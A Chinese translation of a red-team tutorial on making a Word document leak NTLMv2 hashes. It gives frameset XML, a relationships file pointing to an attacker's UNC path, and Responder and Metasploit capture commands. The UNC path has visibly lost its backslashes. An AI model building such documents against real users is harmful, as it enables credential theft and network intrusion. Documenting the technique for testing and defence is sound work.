利用Office文件的Frameset 远程获取 NTLM 哈希 - 嘶吼 RoarTalk – 回归最本质的信息安全,互联网安全新媒体,4hou.com

利用Office文件的Frameset 远程获取 NTLM 哈希

李白 内网渗透 2017年12月22日发布

导语:微软Office文档文件对于红队评估起着至关重要的作用,因为他们通常习惯于在客户的内部网络上获得一些初步的立足点。保持在雷达之下也是一个关键的因素,这只能通过滥用合法的Windows功能或可靠的应用程序(如Microsoft Office)来实现。

微软Office文档文件对于红队评估起着至关重要的作用,因为他们通常习惯于在客户的内部网络上获得一些初步的立足点。保持在雷达之下也是一个关键的因素,这只能通过滥用合法的Windows功能或可靠的应用程序(如Microsoft Office)来实现。

在历史上,Microsoft Word被用作HTML编辑器。这意味着它可以支持HTML元素,如框架集。因此,可以将Microsoft Word文档与UNC路径相链接,并将其与Responder结合,就能从外部捕获NTLM哈希值。0

带有docx扩展名的Word文档实际上是一个包含各种XML文档的zip文件。这些XML文件主要用于控制主题,字体,文档的设置和Web设置。使用7-zip 可以打开该压缩包看看这些文件:

docx-contents.png

Docx 文件内容

word文件夹中包含一个名为webSettings.xml的文件。这个文件需要修改才能包含框架集。

websettings-file.png

webSettings文件

添加下面的代码将创建与另一个文件的链接。

<w:frameset>
<w:framesetSplitbar>
<w:w w:val="60"/>
<w:color w:val="auto"/>
<w:noBorder/>
</w:framesetSplitbar>
<w:frameset>
<w:frame>
<w:name w:val="3"/>
<w:sourceFileName r:id="rId1"/>
<w:linkedToFile/>
</w:frame>
</w:frameset>
</w:frameset>

websettings-xml-frameset.png

webSettings XML – 框架集

包含框架集的新的webSettings.xml文件需要重新添加到存档中,覆盖以前的版本。

websettings-with-frameset-adding-new-version-to-archive.png

带有Frameset的webSettings – 添加新版本到压缩包

必须创建一个新文件(webSettings.xml.rels),并包含关系ID (rId1),UNC路径和TargetMode(是否是外部或内部的)。

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships
xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="192.168.1.169Microsoft_Office_Updates.docx" TargetMode="External"/>
</Relationships>

websettings-xml-relationship-file-contents.png

web设置XML关系文件 的内容

_rels文件夹包含了文档的字体,风格,主题,设置等。将新的文件放置在该目录将最终确定和之前已经通过框架集创建的文件之间的关系链接。

websettings-xml-rels.png

webSettings XML rels 文件夹

现在,Word文档已被武装化并在打开时连接到网络上的UNC路径,Responder可以被配置为捕获NTLM哈希值。

responder -I wlan0 -e 192.168.1.169 -b -A -v

frameset-responder-configuration.png

Responder配置

一旦目标用户打开Word文档,它将尝试连接到UNC路径。

word-connect-to-unc-path-via-frameset.png

打开Word文档会通过框架集连接到UNC路径

Responder将检索用户的NTLMv2哈希值。

responder-ntlmv2-hash-via-frameset.png

Responder 可以获取到通过框架集的NTLMv2哈希

或者可以使用Metasploit Framework来代替Responder来捕获密码哈希值。

auxiliary/server/capture/smb

metasploit-smb-capture-module-for-frameset.png

Metasploit – SMB捕获模块

打开文档后,Metasploit将捕获NTLMv2哈希值。

metasploit-smb-capture-module-ntlmv2-hash-via-frameset1.png

Metasploit SMB捕获模块 – 通过框架集的NTLMv2哈希

结论

如果VPN访问的双因素身份验证未启用且密码策略较弱,则该技术可以允许红队从用户那里获取可用于内部网络访问的域密码哈希值。此外,如果目标用户是本地管理员或域管理员等高权限帐户,则可以将此方法与SMB中继组合利用,就可以获得Meterpreter会话。

本文翻译自:https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/ ,如若转载,请注明原文地址: http://www.4hou.com/technology/9403.html
点赞 0
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论